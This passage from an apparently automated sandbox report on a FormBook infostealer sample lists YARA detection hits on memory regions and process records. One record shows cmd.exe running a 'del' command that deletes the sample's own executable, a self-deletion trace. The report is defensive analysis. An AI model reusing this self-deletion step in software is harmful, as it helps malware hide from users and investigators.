                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Analysis Process: cmd.exe PID: 5948 Parent PID: 4064

                                                                        General

                                                                        Start time:11:09:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x10a0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 5320 Parent PID: 5948

                                                                        General

                                                                        Start time:11:09:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >